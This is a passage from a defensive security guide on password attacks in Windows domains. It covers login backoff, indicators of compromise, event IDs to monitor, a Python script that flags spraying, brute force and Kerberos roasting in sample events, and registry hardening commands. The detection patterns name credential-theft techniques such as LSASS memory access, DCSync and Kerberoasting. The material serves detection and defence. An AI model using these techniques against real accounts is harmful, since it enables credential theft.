def check_password(username, password, attempt_count):
    delay = min(2 ** attempt_count, 30)  # Exponential backoff, capped at 30 s
    time.sleep(delay)
    return verify_password(username, password)  # application-defined credential check
Monitoring and Detection
Detecting password attacks in progress:
Key Indicators of Compromise (IOCs)
- Multiple failed login attempts: Especially from single source or against multiple accounts
- Password spray patterns: Single password tried against many accounts
- Unusual login locations: Logins from unexpected geographic locations
- Impossible travel: Logins from distant locations within short timeframe
- Off-hours authentication: Login attempts outside normal business hours
- LSASS access: Processes accessing LSASS memory (Mimikatz indicator)
- DCSync activity: Unusual replication requests from non-DC systems
Windows Event IDs to Monitor
| Event ID | Description | Significance |
|---|---|---|
| 4625 | Failed logon attempt | Brute force indicator |
| 4648 | Logon using explicit credentials | Possible credential theft |
| 4768 | Kerberos TGT requested | AS-REP roasting: Pre-Authentication Type 0 with ticket encryption 0x17 (RC4) |
| 4769 | Kerberos service ticket requested | Kerberoasting: one account requesting tickets for many SPNs with encryption 0x17 (RC4) |
| 4771 | Kerberos pre-authentication failed | Password attack indicator |
| 4776 | Domain controller validated credentials | NTLM authentication |
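The indicators and event IDs above turn into detection logic once you state the thresholds. The following added example (my own code, not from the page or any SIEM product) runs four rules over a constructed list of events shaped like the fields you would pull from a log pipeline (Event ID, timestamp, account, source address, ticket encryption type, SPN): password spraying and brute force from 4625, Kerberoasting from 4769 and AS-REP roasting from 4768. The 5-minute window and the thresholds (10 accounts, 5 failures, 3 SPNs) are assumptions to tune for your environment.

```python
"""Detecting password-attack patterns in Windows security events (added example, not from the page).

The events, thresholds and window are constructed/assumed for the demo.
"""
from collections import defaultdict, deque


def burst_keys(events, key_fn, value_fn, threshold, window):
    """For each key, check whether any `window`-second span holds >= `threshold` distinct values.
    Returns {key: set_of_values} for keys that tripped (e.g. one source IP -> many account names)."""
    by_key = defaultdict(list)
    for e in events:
        by_key[key_fn(e)].append((e["ts"], value_fn(e)))
    hits = {}
    for key, items in by_key.items():
        items.sort()
        recent = deque()
        for ts, value in items:
            recent.append((ts, value))
            while ts - recent[0][0] > window:       # slide the window forward
                recent.popleft()
            distinct = {v for _, v in recent}
            if len(distinct) >= threshold:
                hits[key] = distinct
    return hits


def detect(events, window=300, spray_users=10, brute_attempts=5, roast_spns=3):
    numbered = [dict(e, seq=i) for i, e in enumerate(events)]
    failed = [e for e in numbered if e["id"] == 4625]
    rc4_tgs = [e for e in numbered if e["id"] == 4769 and e.get("enc") == "0x17"]
    return {
        # one source failing against many distinct accounts: Event 4625 keyed by source address
        "password_spray": burst_keys(failed, lambda e: e["src"], lambda e: e["user"], spray_users, window),
        # many failures against one account from any source: Event 4625 keyed by account
        "brute_force": {u: len(v) for u, v in
                        burst_keys(failed, lambda e: e["user"], lambda e: e["seq"], brute_attempts, window).items()},
        # one account requesting RC4 (0x17) service tickets for many SPNs: Event 4769
        "kerberoast": burst_keys(rc4_tgs, lambda e: e["user"], lambda e: e["spn"], roast_spns, window),
        # TGT issued without pre-authentication and with RC4: Event 4768, Pre-Authentication Type 0
        "asrep_roast": sorted({e["user"] for e in numbered
                               if e["id"] == 4768 and e.get("preauth") == 0 and e.get("enc") == "0x17"}),
    }


# Constructed sample events (ts in seconds; a real feed carries full timestamps)
SAMPLE_EVENTS = (
    [{"id": 4625, "ts": 100 + i, "user": "user%02d" % i, "src": "10.0.0.5"} for i in range(12)]     # spray
    + [{"id": 4625, "ts": 200 + i, "user": "svc-backup", "src": "10.0.0.9"} for i in range(6)]       # brute force
    + [{"id": 4625, "ts": 250, "user": "bob", "src": "10.0.0.21"},                                      # benign typos
       {"id": 4625, "ts": 900, "user": "bob", "src": "10.0.0.21"}]
    + [{"id": 4769, "ts": 300 + i, "user": "jdoe", "spn": s, "enc": "0x17"}                              # Kerberoast
       for i, s in enumerate(["MSSQLSvc/db01", "HTTP/web01", "CIFS/fs01", "MSSQLSvc/db02"])]
    + [{"id": 4769, "ts": 400 + i, "user": "alice", "spn": s, "enc": "0x12"}                             # normal AES
       for i, s in enumerate(["HTTP/web01", "CIFS/fs01", "LDAP/dc01"])]
    + [{"id": 4768, "ts": 500, "user": "legacyapp", "preauth": 0, "enc": "0x17"},                       # AS-REP roastable
       {"id": 4768, "ts": 501, "user": "alice", "preauth": 2, "enc": "0x12"}]
)


if __name__ == "__main__":
    for rule, hits in detect(SAMPLE_EVENTS).items():
        print(rule, hits)
```

The two 4625 rules are deliberately keyed differently: a spray is one source touching many accounts (each account sees a single failure, so a per-account lockout never fires), while brute force is many failures on one account from anywhere. Alice's AES (0x12) service-ticket requests and Bob's two far-apart typos are in the sample precisely to show what does not trip the rules.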
Credential Storage Best Practices
- Disable LM hashes: Ensure only NT hashes are stored and only NTLMv2 is used on the wire
- Enable Credential Guard: Isolate LSASS secrets in a virtualization-based enclave that a dump of lsass.exe cannot reach
- Enable LSA Protection (RunAsPPL): Block non-protected processes from opening LSASS at all
- Implement LAPS: Randomize local admin passwords
- Use managed service accounts (gMSA): Eliminate service account password management and the weak, Kerberoastable passwords it produces
- Deploy privileged access workstations: Dedicated admin workstations
- Implement tiered administration model: Separate admin tiers
- Regular credential rotation: Especially for service accounts and the krbtgt account
Windows Hardening Commands
# Disable LM hash storage (requires reboot)
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v NoLMHash /t REG_DWORD /d 1 /f
# Enable NTLMv2 only
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v LmCompatibilityLevel /t REG_DWORD /d 5 /f
# Disable WDigest (prevent plaintext credential caching)
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
# Enable Credential Guard (Windows 10/11 Enterprise or Education; on by default on recent Enterprise builds)
# Requires UEFI, Secure Boot and CPU virtualization extensions; a TPM 2.0 is recommended for the UEFI lock
# LsaCfgFlags 1 = enabled with UEFI lock, 2 = enabled without lock
reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v EnableVirtualizationBasedSecurity /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LsaCfgFlags /t REG_DWORD /d 1 /f